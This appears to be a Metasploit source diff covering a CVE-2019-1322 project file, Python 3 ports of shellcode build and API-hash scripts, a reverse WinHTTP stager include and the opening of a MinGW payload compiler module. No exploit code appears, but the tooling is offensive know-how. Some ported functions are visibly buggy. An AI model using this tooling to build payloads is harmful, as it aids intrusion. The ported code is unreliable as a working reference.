+      <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;_LIB;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+    </ClCompile>
+    <Link>
+      <SubSystem>Console</SubSystem>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <ClCompile>
+      <WarningLevel>Level3</WarningLevel>
+      <PrecompiledHeader>
+      </PrecompiledHeader>
+      <Optimization>MaxSpeed</Optimization>
+      <FunctionLevelLinking>true</FunctionLevelLinking>
+      <IntrinsicFunctions>true</IntrinsicFunctions>
+      <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;_LIB;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+    </ClCompile>
+    <Link>
+      <SubSystem>Console</SubSystem>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+      <EnableCOMDATFolding>true</EnableCOMDATFolding>
+      <OptimizeReferences>true</OptimizeReferences>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemGroup>
+    <ClCompile Include="cve-2019-1322.cpp" />
+  </ItemGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
+  <ImportGroup Label="ExtensionTargets">
+  </ImportGroup>
+</Project>
@@ -1,5 +1,7 @@
+#!/usr/bin/env python3
+
 #=============================================================================#
-# A simple python build script to build the singles/stages/stagers and 
+# A simple python build script to build the singles/stages/stagers and
 # some usefull information such as offsets and a hex dump. The binary output
 # will be placed in the bin directory. A hex string and usefull comments will
 # be printed to screen.
@@ -12,95 +14,98 @@
 #
 # Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
 #=============================================================================#
-import os, sys, time
+
+import os
+import sys
+import time
 from subprocess import Popen
 from struct import pack
-#=============================================================================#
-def clean( dir="./bin/" ):
-  for root, dirs, files in os.walk( dir ):
-    for name in files:
-      if name[-4:] == ".bin":
-        os.remove( os.path.join( root, name ) )
-#=============================================================================#
-def locate( src_file, dir="./src/" ):
-  for root, dirs, files in os.walk( dir ):
-    for name in files:
-      if src_file == name:
-        return root
-  return None
-#=============================================================================#
-def build( name ):
-  location = locate( "%s.asm" % name )
-  if location:
-    input = os.path.normpath( os.path.join( location, name ) )
-    output = os.path.normpath( os.path.join( "./bin/", name ) )
-    p = Popen( ["nasm", "-f bin", "-O3", "-o %s.bin" % output, "%s.asm" % input ] )
-    p.wait()
-    xmit( name )
-  else:
-    print "[-] Unable to locate '%s.asm' in the src directory" % name
-#=============================================================================#
-def xmit_dump_ruby( data, length=16 ):
-  dump = ""
-  for i in xrange( 0, len( data ), length ):
-    bytes = data[ i : i+length ]
-    hex = "\"%s\"" % ( ''.join( [ "\\x%02X" % ord(x) for x in bytes ] ) )
-    if i+length <= len(data):
-      hex += " +"
-    dump += "%s\n" % ( hex )
-  print dump
-#=============================================================================#
-def xmit_offset( data, name, value ):
-  offset = data.find( value );
-  if offset != -1:
-    print "# %s Offset: %d" % ( name, offset )
-#=============================================================================#
-def xmit( name, dump_ruby=True ):
-  bin = os.path.normpath( os.path.join( "./bin/", "%s.bin" % name ) )
-  f = open( bin, 'rb')
-  data = f.read()
-  print "# Name: %s\n# Length: %d bytes" % ( name, len( data ) )
-  xmit_offset( data, "Port", pack( ">H", 4444 ) )           # 4444
-  xmit_offset( data, "Host", pack( ">L", 0x7F000001 ) )     # 127.0.0.1
-  xmit_offset( data, "ExitFunk", pack( "<L", 0x0A2A1DE0 ) ) # kernel32.dll!ExitThread
-  xmit_offset( data, "ExitFunk", pack( "<L", 0x56A2B5F0 ) ) # kernel32.dll!ExitProcess
-  xmit_offset( data, "ExitFunk", pack( "<L", 0xEA320EFE ) ) # kernel32.dll!SetUnhandledExceptionFilter
-  xmit_offset( data, "ExitFunk", pack( "<L", 0xE035F044 ) ) # kernel32.dll!Sleep
-  if dump_ruby:
-    xmit_dump_ruby( data )
-#=============================================================================#
-def main( argv=None ):
-  if not argv:
-    argv = sys.argv
-  try:
-    if len( argv ) == 1:
-      print "Usage: build.py [clean|all|<name>]"
+
+def clean(dir='./bin/'):
+    for root, dirs, files in os.walk(dir):
+        for name in files:
+            if name[-4:] == '.bin':
+                os.remove(os.path.join(root, name))
+
+def locate(src_file, dir='./src/'):
+    for root, dirs, files in os.walk(dir):
+        for name in files:
+            if src_file == name:
+                return root
+    return None
+
+def build(name):
+    location = locate('%s.asm' % name)
+    if location:
+        input = os.path.normpath(os.path.join(location, name))
+        output = os.path.normpath(os.path.join('./bin/', name))
+        p = Popen(['nasm', '-f bin', '-O3', '-o %s.bin' %
+                   output, '%s.asm' % input])
+        p.wait()
+        xmit(name)
    else:
-      print "# Built on %s\n" % (  time.asctime( time.localtime() ) )
-      if argv[1] == "clean":
-        clean()
-      elif argv[1] == "all":
-        for root, dirs, files in os.walk( "./src/migrate/" ):
-          for name in files:
-            if name[-4:] == ".asm":
-              build( name[:-4] )
-        for root, dirs, files in os.walk( "./src/single/" ):
-          for name in files:
-            if name[-4:] == ".asm":
-              build( name[:-4] )
-        for root, dirs, files in os.walk( "./src/stage/" ):
-          for name in files:
-            if name[-4:] == ".asm":
-              build( name[:-4] )
-        for root, dirs, files in os.walk( "./src/stager/" ):
-          for name in files:
-            if name[-4:] == ".asm":
-              build( name[:-4] )
-      else:
-        build( argv[1] )
-  except Exception, e:
-    print "[-] ", e
-#=============================================================================#
-if __name__ == "__main__":
-  main()
-#=============================================================================#
+        print("[-] Unable to locate '%s.asm' in the src directory" % name)
+
+def xmit_dump_ruby(data, length=16):
+    dump = ''
+    for i in range(0, len(data), length):
+        bytes = data[i: i+length]
+        hex = "\"%s\"" % (''.join(['\\x%02X' % x for x in bytes]))
+        if i+length <= len(data):
+            hex += ' +'
+        dump += '%s\n' % (hex)
+    print(dump)
+
+def xmit_offset(data, name, value):
+    offset = data.find(value)
+    if offset != -1:
+        print('# %s Offset: %d' % (name, offset))
+
+def xmit(name, dump_ruby=True):
+    bin = os.path.normpath(os.path.join('./bin/', '%s.bin' % name))
+    f = open(bin, 'rb')
+    data = f.read()
+    print('# Name: %s\n# Length: %d bytes' % (name, len(data)))
+    xmit_offset(data, 'Port', pack('>H', 4444))           # 4444
+    xmit_offset(data, 'Host', pack('>L', 0x7F000001))     # 127.0.0.1
+    # kernel32.dll!ExitThread
+    xmit_offset(data, 'ExitFunk', pack('<L', 0x0A2A1DE0))
+    # kernel32.dll!ExitProcess
+    xmit_offset(data, 'ExitFunk', pack('<L', 0x56A2B5F0))
+    # kernel32.dll!SetUnhandledExceptionFilter
+    xmit_offset(data, 'ExitFunk', pack('<L', 0xEA320EFE))
+    xmit_offset(data, 'ExitFunk', pack('<L', 0xE035F044))  # kernel32.dll!Sleep
+    if dump_ruby:
+        xmit_dump_ruby(data)
+
+def main(argv=None):
+    if not argv:
+        argv = sys.argv
+    if len(argv) == 1:
+        print('Usage: build.py [clean|all|<name>]')
+    else:
+        print('# Built on %s\n' % (time.asctime(time.localtime())))
+        if argv[1] == 'clean':
+            clean()
+        elif argv[1] == 'all':
+            for root, dirs, files in os.walk('./src/migrate/'):
+                for name in files:
+                    if name[-4:] == '.asm':
+                        build(name[:-4])
+            for root, dirs, files in os.walk('./src/single/'):
+                for name in files:
+                    if name[-4:] == '.asm':
+                        build(name[:-4])
+            for root, dirs, files in os.walk('./src/stage/'):
+                for name in files:
+                    if name[-4:] == '.asm':
+                        build(name[:-4])
+            for root, dirs, files in os.walk('./src/stager/'):
+                for name in files:
+                    if name[-4:] == '.asm':
+                        build(name[:-4])
+        else:
+            build(argv[1])
+
+if __name__ == '__main__':
+    main()
@@ -145,7 +145,7 @@ download_more:
  test eax,eax           ; download failed? (optional?)
  jz failure

-  mov ax, word ptr [edi]
+  mov ax, word [edi]
  add rbx, rax           ; buffer += bytes_received

  test rax,rax           ; optional?
@@ -1,3 +1,4 @@
+#!/usr/bin/env python3
 #=============================================================================#
 # A simple python build script to build the singles/stages/stagers and
 # some usefull information such as offsets and a hex dump. The binary output
@@ -12,117 +13,119 @@
 #
 # Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
 #=============================================================================#
-import os, sys, time
+import os
+import sys
+import time
 from subprocess import Popen
 from struct import pack
-#=============================================================================#
-def clean( dir="./bin/" ):
-	for root, dirs, files in os.walk( dir ):
-		for name in files:
-			os.remove( os.path.join( root, name ) )
-#=============================================================================#
-def locate( src_file, dir="./src/" ):
-	for root, dirs, files in os.walk( dir ):
-		for name in files:
-			if src_file == name:
-				return root
-	return None

-#=============================================================================#
-def build( name ):
-	location = locate( "%s.asm" % name )
-	if location:
-		input = os.path.normpath( os.path.join( location, name ) )
-		output = os.path.normpath( os.path.join( "./bin/", name ) )
-		p = Popen( ["nasm", "-f bin", "-O3", "-o %s.bin" % output, "%s.asm" % input ] )
-		p.wait()
-		xmit( name )
-	else:
-		print "[-] Unable to locate '%s.asm' in the src directory" % name
+def clean(dir='./bin/'):
+    for root, dirs, files in os.walk(dir):
+        for name in files:
+            if name != '.keep':
+                os.remove(os.path.join(root, name))

-#=============================================================================#
-def xmit_dump_ruby( data, length=16 ):
-	dump = ""
-	for i in xrange( 0, len( data ), length ):
-		bytes = data[ i : i+length ]
-		hex = "\"%s\"" % ( ''.join( [ "\\x%02X" % ord(x) for x in bytes ] ) )
-		if i+length <= len(data):
-			hex += " +"
-		dump += "%s\n" % ( hex )
-	print dump
+def locate(src_file, dir='./src/'):
+    for root, dirs, files in os.walk(dir):
+        for name in files:
+            if src_file == name:
+                return root
+    return None

-#=============================================================================#
-def xmit_offset( data, name, value, match_offset=0 ):
-	offset = data.find( value );
-	if offset != -1:
-		print "# %s Offset: %d" % ( name, offset + match_offset )
+def build(name):
+    location = locate('%s.asm' % name)
+    if location:
+        input = os.path.normpath(os.path.join(location, name))
+        output = os.path.normpath(os.path.join('./bin/', name))
+        p = Popen(['nasm', '-f bin', '-O3', '-o %s.bin' %
+                   output, '%s.asm' % input])
+        p.wait()
+        xmit(name)
+    else:
+        print("[-] Unable to locate '%s.asm' in the src directory" % name)

-#=============================================================================#
-def xmit( name, dump_ruby=True ):
-	bin = os.path.normpath( os.path.join( "./bin/", "%s.bin" % name ) )
-	f = open( bin, 'rb')
-	data = f.read()
-	print "# Name: %s\n# Length: %d bytes" % ( name, len( data ) )
-	xmit_offset( data, "Port", pack( ">H", 4444 ) )           # 4444
-	xmit_offset( data, "LEPort", pack( "<H", 4444 ) )         # 4444
-	xmit_offset( data, "Host", pack( ">L", 0x7F000001 ) )     # 127.0.0.1
-	xmit_offset( data, "IPv6Host", pack( "<Q", 0xBBBBBBBBBBBBBBB1 ) ) # An IPv6 Address
-	xmit_offset( data, "IPv6ScopeId", pack( "<L", 0xAAAAAAA1 ) ) # An IPv6 Scope ID
-	xmit_offset( data, "HostName", "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX\x00" )     # hostname filler
-	xmit_offset( data, "RetryCounter", "\x6a\x05", 1 )     # socket retry
-	xmit_offset( data, "CodeLen", pack( "<L", 0x12345678 ) )  # Filler
-	xmit_offset( data, "Hostname", "https" )
-	xmit_offset( data, "ExitFunk", pack( "<L", 0x0A2A1DE0 ) ) # kernel32.dll!ExitThread
-	xmit_offset( data, "ExitFunk", pack( "<L", 0x56A2B5F0 ) ) # kernel32.dll!ExitProcess
-	xmit_offset( data, "ExitFunk", pack( "<L", 0xEA320EFE ) ) # kernel32.dll!SetUnhandledExceptionFilter
-	xmit_offset( data, "ExitFunk", pack( "<L", 0xE035F044 ) ) # kernel32.dll!Sleep
-	xmit_offset( data, "EggTag1", pack( "<L", 0xDEADDEAD ) )  # Egg tag 1
-	xmit_offset( data, "EggTag2", pack( "<L", 0xC0DEC0DE ) )  # Egg tag 2
-	xmit_offset( data, "EggTagSize", pack( ">H", 0x1122 ) )   # Egg tag size
-	xmit_offset( data, "RC4Key", "RC4KeyMetasploit")          # RC4 key
-	xmit_offset( data, "XORKey", "XORK")                      # XOR key
-	if( name.find( "egghunter" ) >= 0 ):
-		null_count = data.count( "\x00" )
-		if( null_count > 0 ):
-			print "# Note: %d NULL bytes found." % ( null_count )
-	if dump_ruby:
-		xmit_dump_ruby( data )
+def xmit_dump_ruby(data, length=16):
+    dump = ''
+    for i in range(0, len(data), length):
+        bytes = data[i: i+length]
+        hex = "\"%s\"" % (''.join(['\\x%02X' % x for x in bytes]))
+        if i+length <= len(data):
+            hex += ' +'
+        dump += '%s\n' % (hex)
+    print(dump)

-#=============================================================================#
-def main( argv=None ):
-	if not argv:
-		argv = sys.argv
-	try:
-		if len( argv ) == 1:
-			print "Usage: build.py [clean|all|<name>]"
-		else:
-			print "# Built on %s\n" % (  time.asctime( time.localtime() ) )
-			if argv[1] == "clean":
-				clean()
-			elif argv[1] == "all":
-				for root, dirs, files in os.walk( "./src/egghunter/" ):
-					for name in files:
-						build( name[:-4] )
-				for root, dirs, files in os.walk( "./src/migrate/" ):
-					for name in files:
-						build( name[:-4] )
-				for root, dirs, files in os.walk( "./src/single/" ):
-					for name in files:
-						build( name[:-4] )
-				for root, dirs, files in os.walk( "./src/stage/" ):
-					for name in files:
-						build( name[:-4] )
-				for root, dirs, files in os.walk( "./src/stager/" ):
-					for name in files:
-						build( name[:-4] )
-				for root, dirs, files in os.walk( "./src/kernel/" ):
-					for name in files:
-						build( name[:-4] )
-			else:
-				build( argv[1] )
-	except Exception, e:
-		print "[-] ", e
-#=============================================================================#
-if __name__ == "__main__":
-  main()
-#=============================================================================#
+def xmit_offset(data, name, value, match_offset=0):
+    offset = data.find(value)
+    if offset != -1:
+        print('# %s Offset: %d' % (name, offset + match_offset))
+
+def xmit(name, dump_ruby=True):
+    bin = os.path.normpath(os.path.join('./bin/', '%s.bin' % name))
+    f = open(bin, 'rb')
+    data = bytearray(f.read())
+    print('# Name: %s\n# Length: %d bytes' % (name, len(data)))
+    xmit_offset(data, 'Port', pack('>H', 4444))           # 4444
+    xmit_offset(data, 'LEPort', pack('<H', 4444))         # 4444
+    xmit_offset(data, 'Host', pack('>L', 0x7F000001))     # 127.0.0.1
+    xmit_offset(data, 'IPv6Host', pack(
+        '<Q', 0xBBBBBBBBBBBBBBB1))  # An IPv6 Address
+    xmit_offset(data, 'IPv6ScopeId', pack(
+        '<L', 0xAAAAAAA1))  # An IPv6 Scope ID
+    # hostname filler
+    xmit_offset(data, 'HostName',
+                b'XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX\x00')
+    xmit_offset(data, 'RetryCounter', b'\x6a\x05', 1)     # socket retry
+    xmit_offset(data, 'CodeLen', pack('<L', 0x12345678))  # Filler
+    xmit_offset(data, 'Hostname', b'https')
+    # kernel32.dll!ExitThread
+    xmit_offset(data, 'ExitFunk', pack('<L', 0x0A2A1DE0))
+    # kernel32.dll!ExitProcess
+    xmit_offset(data, 'ExitFunk', pack('<L', 0x56A2B5F0))
+    # kernel32.dll!SetUnhandledExceptionFilter
+    xmit_offset(data, 'ExitFunk', pack('<L', 0xEA320EFE))
+    xmit_offset(data, 'ExitFunk', pack('<L', 0xE035F044))  # kernel32.dll!Sleep
+    xmit_offset(data, 'EggTag1', pack('<L', 0xDEADDEAD))  # Egg tag 1
+    xmit_offset(data, 'EggTag2', pack('<L', 0xC0DEC0DE))  # Egg tag 2
+    xmit_offset(data, 'EggTagSize', pack('>H', 0x1122))   # Egg tag size
+    xmit_offset(data, 'RC4Key', b'RC4KeyMetasploit')          # RC4 key
+    xmit_offset(data, 'XORKey', b'XORK')                      # XOR key
+    if(name.find('egghunter') >= 0):
+        null_count = data.count('\x00')
+        if(null_count > 0):
+            print('# Note: %d NULL bytes found.' % (null_count))
+    if dump_ruby:
+        xmit_dump_ruby(data)
+
+def main(argv=None):
+    if not argv:
+        argv = sys.argv
+        if len(argv) == 1:
+            print('Usage: build.py [clean|all|<name>]')
+        else:
+            print('# Built on %s\n' % (time.asctime(time.localtime())))
+            if argv[1] == 'clean':
+                clean()
+            elif argv[1] == 'all':
+                for root, dirs, files in os.walk('./src/egghunter/'):
+                    for name in files:
+                        build(name[:-4])
+                for root, dirs, files in os.walk('./src/migrate/'):
+                    for name in files:
+                        build(name[:-4])
+                for root, dirs, files in os.walk('./src/single/'):
+                    for name in files:
+                        build(name[:-4])
+                for root, dirs, files in os.walk('./src/stage/'):
+                    for name in files:
+                        build(name[:-4])
+                for root, dirs, files in os.walk('./src/stager/'):
+                    for name in files:
+                        build(name[:-4])
+                for root, dirs, files in os.walk('./src/kernel/'):
+                    for name in files:
+                        build(name[:-4])
+            else:
+                build(argv[1])
+
+if __name__ == '__main__':
+    main()
@@ -1,146 +1,152 @@
-#=============================================================================#
-# This script can detect hash collisions between exported API functions in 
-# multiple modules by either scanning a directory tree or just a single module.
-# This script can also just output the correct hash value for any single API
-# function for use with the 'api_call' function in 'block_api.asm'.
-#
-# Example: Detect fatal collisions against all modules in the C drive:
-#     >hash.py /dir c:\
-#
-# Example: List the hashes for all exports from kernel32.dll (As found in 'c:\windows\system32\')
-#     >hash.py /mod c:\windows\system32\ kernel32.dll
-#
-# Example: Simply print the correct hash value for the function kernel32.dll!WinExec
-#     >hash.py kernel32.dll WinExec
-#
-# Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
-#=============================================================================#
-from sys import path
-import os, time, sys
-
-# Modify this path to pefile to suit your machine...
-pefile_path = "D:\\Development\\Frameworks\\pefile\\"
-
-path.append( pefile_path )
-import pefile
-#=============================================================================#
-collisions = [  ( 0x006B8029, "ws2_32.dll!WSAStartup" ),
-                ( 0xE0DF0FEA, "ws2_32.dll!WSASocketA" ),
-                ( 0x6737DBC2, "ws2_32.dll!bind" ),
-                ( 0xFF38E9B7, "ws2_32.dll!listen" ),
-                ( 0xE13BEC74, "ws2_32.dll!accept" ),
-                ( 0x614D6E75, "ws2_32.dll!closesocket" ),
-                ( 0x6174A599, "ws2_32.dll!connect" ),
-                ( 0x5FC8D902, "ws2_32.dll!recv" ),
-                ( 0x5F38EBC2, "ws2_32.dll!send" ),
-                
-                ( 0x5BAE572D, "kernel32.dll!WriteFile" ),
-                ( 0x4FDAF6DA, "kernel32.dll!CreateFileA" ),
-                ( 0x13DD2ED7, "kernel32.dll!DeleteFileA" ),
-                ( 0xE449F330, "kernel32.dll!GetTempPathA" ),
-                ( 0x528796C6, "kernel32.dll!CloseHandle" ),
-                ( 0x863FCC79, "kernel32.dll!CreateProcessA" ),
-                ( 0xE553A458, "kernel32.dll!VirtualAlloc" ),
-                ( 0x300F2F0B, "kernel32.dll!VirtualFree" ),
-                ( 0x0726774C, "kernel32.dll!LoadLibraryA" ),
-                ( 0x7802F749, "kernel32.dll!GetProcAddress" ),
-                ( 0x601D8708, "kernel32.dll!WaitForSingleObject" ),
-                ( 0x876F8B31, "kernel32.dll!WinExec" ),
-                ( 0x9DBD95A6, "kernel32.dll!GetVersion" ),
-                ( 0xEA320EFE, "kernel32.dll!SetUnhandledExceptionFilter" ),
-                ( 0x56A2B5F0, "kernel32.dll!ExitProcess" ),
-                ( 0x0A2A1DE0, "kernel32.dll!ExitThread" ),
-                
-                ( 0x6F721347, "ntdll.dll!RtlExitUserThread" ),
-                
-                ( 0x23E38427, "advapi32.dll!RevertToSelf" )
-              ]
-
-collisions_detected = {}
-modules_scanned = 0
-functions_scanned = 0
-#=============================================================================#
-def ror( dword, bits ):
-  return ( dword >> bits | dword << ( 32 - bits ) ) & 0xFFFFFFFF
-#=============================================================================#
-def unicode( string, uppercase=True ):
-  result = "";
-  if uppercase:
-    string = string.upper()
-  for c in string:
-    result += c + "\x00"
-  return result
-#=============================================================================#
-def hash( module, function, bits=13, print_hash=True ):
-  module_hash = 0
-  function_hash = 0
-  for c in unicode( module + "\x00" ):
-    module_hash  = ror( module_hash, bits )
-    module_hash += ord( c )
-  for c in str( function + "\x00" ):
-    function_hash  = ror( function_hash, bits )
-    function_hash += ord( c )
-  h = module_hash + function_hash & 0xFFFFFFFF
-  if print_hash:
-    print "[+] 0x%08X = %s!%s" % ( h, module.lower(), function )
-  return h
-#=============================================================================#
-def scan( dll_path, dll_name, print_hashes=False, print_collisions=True ):
-  global modules_scanned
-  global functions_scanned
-  try:
-    dll_name = dll_name.lower()
-    modules_scanned += 1
-    pe = pefile.PE( os.path.join( dll_path, dll_name ) )
-    for export in pe.DIRECTORY_ENTRY_EXPORT.symbols:
-      if export.name is None:
-        continue
-      h = hash( dll_name, export.name, print_hash=print_hashes )
-      for ( col_hash, col_name ) in collisions:
-        if col_hash == h and col_name != "%s!%s" % (dll_name, export.name):
-          if h not in collisions_detected.keys():
-            collisions_detected[h] = []
-          collisions_detected[h].append( (dll_path, dll_name, export.name) )
-          break
-      functions_scanned += 1
-  except:
-    pass
-#=============================================================================#
-def scan_directory( dir ):
-  for dot, dirs, files in os.walk( dir ):
-    for file_name in files:
-      if file_name[-4:] == ".dll":# or file_name[-4:] == ".exe":
-        scan( dot, file_name )
-  print "\n[+] Found %d Collisions.\n" % ( len(collisions_detected) )
-  for h in collisions_detected.keys():
-    for (col_hash, col_name ) in collisions:
-      if h == col_hash:
-        detected_name = col_name
-        break
-    print "[!] Collision detected for 0x%08X (%s):" % ( h, detected_name )
-    for (collided_dll_path, collided_dll_name, collided_export_name) in collisions_detected[h]:
-      print "\t%s!%s (%s)" % ( collided_dll_name, collided_export_name, collided_dll_path )
-  print "\n[+] Scanned %d exported functions via %d modules.\n" % ( functions_scanned, modules_scanned )
-#=============================================================================#
-def main( argv=None ):
-  if not argv:
-    argv = sys.argv
-  try:
-    if len( argv ) == 1:
-      print "Usage: hash.py [/dir <path>] | [/mod <path> <module.dll>] | [<module.dll> <function>]"
-    else:
-      print "[+] Ran on %s\n" % (  time.asctime( time.localtime() ) )
-      if argv[1] == "/dir":
-        print "[+] Scanning directory '%s' for collisions..." % argv[2]
-        scan_directory( argv[2] )
-      elif argv[1] == "/mod":
-        print "[+] Scanning module '%s' in directory '%s'..." % ( argv[3], argv[2] )
-        scan( argv[2], argv[3], print_hashes=True )
-      else:
-        hash( argv[1], argv[2] )
-  except Exception, e:
-    print "[-] ", e
-#=============================================================================#
-if __name__ == "__main__":
-  main()
-#=============================================================================#
+#!/usr/bin/env python3
+#=============================================================================#
+# This script can detect hash collisions between exported API functions in
+# multiple modules by either scanning a directory tree or just a single module.
+# This script can also just output the correct hash value for any single API
+# function for use with the 'api_call' function in 'block_api.asm'.
+#
+# Example: Detect fatal collisions against all modules in the C drive:
+#     >hash.py /dir c:\
+#
+# Example: List the hashes for all exports from kernel32.dll (As found in 'c:\windows\system32\')
+#     >hash.py /mod c:\windows\system32\ kernel32.dll
+#
+# Example: Simply print the correct hash value for the function kernel32.dll!WinExec
+#     >hash.py kernel32.dll WinExec
+#
+# Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
+#=============================================================================#
+import pefile
+from sys import path
+import os
+import time
+import sys
+
+# Modify this path to pefile to suit your machine...
+pefile_path = 'D:\\Development\\Frameworks\\pefile\\'
+
+path.append(pefile_path)
+collisions = [(0x006B8029, 'ws2_32.dll!WSAStartup'),
+              (0xE0DF0FEA, 'ws2_32.dll!WSASocketA'),
+              (0x6737DBC2, 'ws2_32.dll!bind'),
+              (0xFF38E9B7, 'ws2_32.dll!listen'),
+              (0xE13BEC74, 'ws2_32.dll!accept'),
+              (0x614D6E75, 'ws2_32.dll!closesocket'),
+              (0x6174A599, 'ws2_32.dll!connect'),
+              (0x5FC8D902, 'ws2_32.dll!recv'),
+              (0x5F38EBC2, 'ws2_32.dll!send'),
+
+              (0x5BAE572D, 'kernel32.dll!WriteFile'),
+              (0x4FDAF6DA, 'kernel32.dll!CreateFileA'),
+              (0x13DD2ED7, 'kernel32.dll!DeleteFileA'),
+              (0xE449F330, 'kernel32.dll!GetTempPathA'),
+              (0x528796C6, 'kernel32.dll!CloseHandle'),
+              (0x863FCC79, 'kernel32.dll!CreateProcessA'),
+              (0xE553A458, 'kernel32.dll!VirtualAlloc'),
+              (0x300F2F0B, 'kernel32.dll!VirtualFree'),
+              (0x0726774C, 'kernel32.dll!LoadLibraryA'),
+              (0x7802F749, 'kernel32.dll!GetProcAddress'),
+              (0x601D8708, 'kernel32.dll!WaitForSingleObject'),
+              (0x876F8B31, 'kernel32.dll!WinExec'),
+              (0x9DBD95A6, 'kernel32.dll!GetVersion'),
+              (0xEA320EFE, 'kernel32.dll!SetUnhandledExceptionFilter'),
+              (0x56A2B5F0, 'kernel32.dll!ExitProcess'),
+              (0x0A2A1DE0, 'kernel32.dll!ExitThread'),
+
+              (0x6F721347, 'ntdll.dll!RtlExitUserThread'),
+
+              (0x23E38427, 'advapi32.dll!RevertToSelf')
+              ]
+
+collisions_detected = {}
+modules_scanned = 0
+functions_scanned = 0
+
+def ror(dword, bits):
+    return (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF
+
+def unicode(string, uppercase=True):
+    result = ''
+    if uppercase:
+        string = string.upper()
+    for c in string:
+        result += c + '\x00'
+    return result
+
+def hash(module, function, bits=13, print_hash=True):
+    module_hash = 0
+    function_hash = 0
+    for c in unicode(module + '\x00'):
+        module_hash = ror(module_hash, bits)
+        module_hash += ord(c)
+    for c in str(function + b'\x00'):
+        function_hash = ror(function_hash, bits)
+        function_hash += ord(c)
+    h = module_hash + function_hash & 0xFFFFFFFF
+    if print_hash:
+        print('[+] 0x%08X = %s!%s' % (h, module.lower(), function))
+    return h
+
+def scan(dll_path, dll_name, print_hashes=False, print_collisions=True):
+    global modules_scanned
+    global functions_scanned
+    dll_name = dll_name.lower()
+    modules_scanned += 1
+    pe = pefile.PE(os.path.join(dll_path, dll_name))
+    for export in pe.DIRECTORY_ENTRY_EXPORT.symbols:
+        if export.name is None:
+            continue
+        h = hash(dll_name, export.name, print_hash=print_hashes)
+        for (col_hash, col_name) in collisions:
+            if col_hash == h and col_name != '%s!%s' % (dll_name, export.name):
+                if h not in collisions_detected.keys():
+                    collisions_detected[h] = []
+                collisions_detected[h].append(
+                    (dll_path, dll_name, export.name))
+                break
+        functions_scanned += 1
+
+def scan_directory(dir):
+    for dot, dirs, files in os.walk(dir):
+        for file_name in files:
+            if file_name[-4:] == '.dll':  # or file_name[-4:] == ".exe":
+                scan(dot, file_name)
+    print('\n[+] Found %d Collisions.\n' % (len(collisions_detected)))
+    for h in collisions_detected.keys():
+        for (col_hash, col_name) in collisions:
+            if h == col_hash:
+                detected_name = col_name
+                break
+        print('[!] Collision detected for 0x%08X (%s):' % (h, detected_name))
+        for (collided_dll_path, collided_dll_name, collided_export_name) in collisions_detected[h]:
+            print('\t%s!%s (%s)' %
+                  (collided_dll_name, collided_export_name, collided_dll_path))
+    print('\n[+] Scanned %d exported functions via %d modules.\n' %
+          (functions_scanned, modules_scanned))
+
+def usage():
+    print(
+        'Usage: hash.py [/dir <path>] | [/mod <path> <module.dll>] | [<module.dll> <function>]')
+
+
+def main(argv=None):
+    if not argv:
+        argv = sys.argv
+    if len(argv) == 1:
+        usage()
+    else:
+        print('[+] Ran on %s\n' % (time.asctime(time.localtime())))
+        if argv[1] == '/dir':
+            print("[+] Scanning directory '%s' for collisions..." % argv[2])
+            scan_directory(argv[2])
+        elif argv[1] == '/mod':
+            print("[+] Scanning module '%s' in directory '%s'..." %
+                  (argv[3], argv[2]))
+            scan(argv[2], argv[3], print_hashes=True)
+        elif len(argv) < 3:
+            usage()
+        else:
+            hash(argv[1], argv[2])
+
+if __name__ == '__main__':
+    main()
@@ -14,6 +14,6 @@
 %include "./src/block/block_api.asm"
 start:                   ;
  pop ebp                ; pop off the address of 'api_call' for calling later.
-%include "./src/block/block_reverse_winhttp_http.asm"
+%include "./src/block/block_reverse_winhttp.asm"
  ; By here we will have performed the reverse_tcp connection and EDI will be our socket.

@@ -0,0 +1,122 @@
+require 'msf/util/helper'
+require 'open3'
+
+module Metasploit
+  module Framework
+    module Compiler
+      module Mingw
+        MINGW_X86 = 'i686-w64-mingw32-gcc'
+        MINGW_X64 = 'x86_64-w64-mingw32-gcc'
+
+        INCLUDE_DIR = File.join(Msf::Config.data_directory, 'headers', 'windows', 'c_payload_util')
+        UTILITY_DIR = File.join(Msf::Config.data_directory, 'utilities', 'encrypted_payload')
+
+        def compile_c(src)
+          cmd = build_cmd(src)
+
+          stdin_err, status = Open3.capture2e(cmd)
+          stdin_err
+        end
+
+        def build_cmd(src)
+          src_file = "#{self.file_name}.c"
+          exe_file = "#{self.file_name}.exe"
+
+          cmd = ''
+          link_options = '-Wl,'
+
+          File.write(src_file, src)
+
+          opt_level = [ 'Os', 'O0', 'O1', 'O2', 'O3', 'Og' ].include?(self.opt_lvl) ? "-#{self.opt_lvl} " : "-O2 "
+
+          cmd << "#{self.mingw_bin} "
+          cmd << "#{src_file} -I #{INCLUDE_DIR} "
+          cmd << "-o #{exe_file} "
+
+          # gives each function its own section
+          # allowing them to be reordered
+          cmd << '-ffunction-sections '
+          cmd << '-fno-asynchronous-unwind-tables '
+          cmd << '-nostdlib '
+          cmd << '-fno-ident '
+          cmd << opt_level
+
+          link_options << '--no-seh,'
+          link_options << '-s,' if self.strip_syms
+          link_options << "-T#{self.link_script}" if self.link_script
+
+          cmd << link_options
+
+          cmd
+        end
+
+        def cleanup_files
+          src_file = "#{self.file_name}.c"
+          exe_file = "#{self.file_name}.exe"
+
+          unless self.keep_src
+            File.delete(src_file) if File.exist?(src_file)
+          end
+
+          unless self.keep_exe
+            File.delete(exe_file) if File.exist?(exe_file)
+          end
+        rescue Errno::ENOENT
+          print_error("Failed to delete file")
+        end
+
+        class X86
+          include Mingw
+
